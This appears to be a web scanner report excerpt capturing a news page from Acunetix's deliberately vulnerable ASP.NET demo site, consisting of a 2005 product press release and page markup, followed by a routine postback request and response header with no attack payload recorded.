iaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4+L8NgEI5fU11kxKVg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsmpfVDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMM7CCcDz0WSHUDA7sLxpWzaC0J1" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	POST
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 Content-Length: 3707 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,707 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwK30rH2AgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE1qoi%2FTB7mR4IysbuEg0lOgmHIs
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18011
